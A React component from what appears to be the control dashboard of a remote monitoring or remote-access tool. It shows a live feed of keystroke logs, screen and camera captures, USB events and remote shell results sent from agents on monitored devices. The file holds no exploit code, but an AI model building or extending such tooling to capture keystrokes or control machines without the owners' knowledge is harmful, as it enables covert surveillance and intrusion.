import React, { useState, useRef, useEffect } from 'react';
import { useLiveEvents } from '../hooks/useLiveEvents';
import { useDevices } from '../store/devices';

const EVENT_COLORS = {
  keylog:       'var(--accent)',
  screenshot:   'var(--green)',
  activity:     '#a78bfa',
  agent_online: 'var(--green)',
  agent_offline:'var(--red)',
  usb_event:    'var(--yellow)',
  shell_result: '#f97316',
  heartbeat:    'var(--border)',
  processes:    '#06b6d4',
};

const EVENT_ICONS = {
  keylog:       '⌨',
  screenshot:   '📸',
  activity:     '🖥',
  agent_online: '🟢',
  agent_offline:'🔴',
  usb_event:    '💾',
  shell_result: '⚡',
  heartbeat:    '♡',
  processes:    '📋',
  camera:       '📷',
};

export default function LiveFeed() {
  const [events, setEvents] = useState([]);
  const [paused, setPaused] = useState(false);
  const [filter, setFilter] = useState('all');
  const [deviceFilter, setDeviceFilter] = useState('all');
  const bottomRef = useRef(null);
  const pausedRef = useRef(false);
  const { devices } = useDevices();

  pausedRef.current = paused;

  useLiveEvents((event) => {
    if (pausedRef.current) return;
    setEvents(prev => [{
      ...event,
      id: Date.now() + Math.random(),
      received_at: new Date().toISOString(),
    }, ...prev].slice(0, 500));   // keep last 500
  });

  const filtered = events.filter(e => {
    if (filter !== 'all' && e.event !== filter) return false;
    if (deviceFilter !== 'all' && e.device_id !== deviceFilter) return false;
    return true;
  });

  const deviceName = (id) => {
    const d = devices.find(d => d.device_id === id);
    return d?.label || d?.hostname || id?.slice(0, 8) || '?';
  };

  const eventTypes = [...new Set(events.map(e => e.event))];

  return (
    <div style={{ height:'calc(100vh - 100px)', display:'flex', flexDirection:'column' }}>
      {/* Toolbar */}
      <div style={{ display:'flex', alignItems:'center', gap:10, marginBottom:12, flexWrap:'wrap' }}>
        <h2 style={{ fontWeight:700 }}>Live Event Feed</h2>
        <span style={{ color:'var(--green)', fontSize:12 }}>● Live</span>

        <select value={filter} onChange={e => setFilter(e.target.value)} style={selectStyle}>
          <option value="all">All events</option>
          {eventTypes.map(t => <option key={t} value={t}>{t}</option>)}
        </select>

        <select value={deviceFilter} onChange={e => setDeviceFilter(e.target.value)} style={selectStyle}>
          <option value="all">All devices</option>
          {devices.map(d => (
            <option key={d.device_id} value={d.device_id}>
              {d.label || d.hostname}
            </option>
          ))}
        </select>

        <button onClick={() => setPaused(p => !p)} style={{
          ...btnStyle,
          color: paused ? 'var(--yellow)' : 'var(--muted)',
          borderColor: paused ? 'var(--yellow)' : 'var(--border)',
        }}>
          {paused ? '▶ Resume' : '⏸ Pause'}
        </button>

        <button onClick={() => setEvents([])} style={btnStyle}>Clear</button>
        <span style={{ color:'var(--muted)', fontSize:12 }}>{filtered.length} events</span>
      </div>

      {/* Event stream */}
      <div style={{ flex:1, overflowY:'auto', fontFamily:'monospace', fontSize:12 }}>
        {filtered.length === 0 && (
          <div style={{ textAlign:'center', color:'var(--muted)', padding:60 }}>
            Waiting for events…
          </div>
        )}
        {filtered.map((e) => (
          <div key={e.id} style={{
            display:'flex', alignItems:'flex-start', gap:10,
            padding:'6px 10px', borderBottom:'1px solid var(--border)20',
            background: e.event === 'keylog' ? 'var(--surface)40' : 'transparent',
          }}>
            <span style={{ fontSize:14, flexShrink:0 }}>
              {EVENT_ICONS[e.event] || '●'}
            </span>
            <span style={{ color: EVENT_COLORS[e.event] || 'var(--text)',
              width:110, flexShrink:0, fontSize:11 }}>
              {e.event}
            </span>
            <span style={{ color:'var(--accent)', width:90, flexShrink:0, fontSize:11 }}>
              {deviceName(e.device_id)}
            </span>
            <span style={{ flex:1, color:'var(--text)', overflow:'hidden',
              textOverflow:'ellipsis', whiteSpace:'nowrap' }}>
              {_summarize(e)}
            </span>
            <span style={{ color:'var(--muted)', flexShrink:0, fontSize:10 }}>
              {new Date(e.received_at).toLocaleTimeString()}
            </span>
          </div>
        ))}
        <div ref={bottomRef} />
      </div>
    </div>
  );
}

function _summarize(e) {
  switch (e.event) {
    case 'keylog':    return `[${e.application}] ${e.window} → ${e.keys?.slice(0,80)}`;
    case 'screenshot':return `Captured (${e.is_camera ? 'camera' : 'screen'}) ${e.path}`;
    case 'activity':  return `${e.data?.application} — ${e.data?.window_title?.slice(0,60)}`;
    case 'heartbeat': return `CPU ${e.data?.cpu_pct}% | RAM ${e.data?.ram_pct}%`;
    case 'usb_event': return `USB ${e.usb_event}: ${e.device?.device || '?'}`;
    case 'shell_result': return `rc=${e.returncode} → ${e.stdout?.slice(0,60)}`;
    case 'agent_online':  return 'Connected';
    case 'agent_offline': return 'Disconnected';
    default:          return JSON.stringify(e).slice(0, 80);
  }
}

const selectStyle = {
  padding:'5px 8px', background:'var(--surface)', border:'1px solid var(--border)',
  borderRadius:6, color:'var(--text)', fontSize:12,
};
const btnStyle = {
  padding:'5px 12px', background:'transparent', border:'1px solid var(--border)',
  borderRadius:6, color:'var(--muted)', cursor:'pointer', fontSize:12,
};
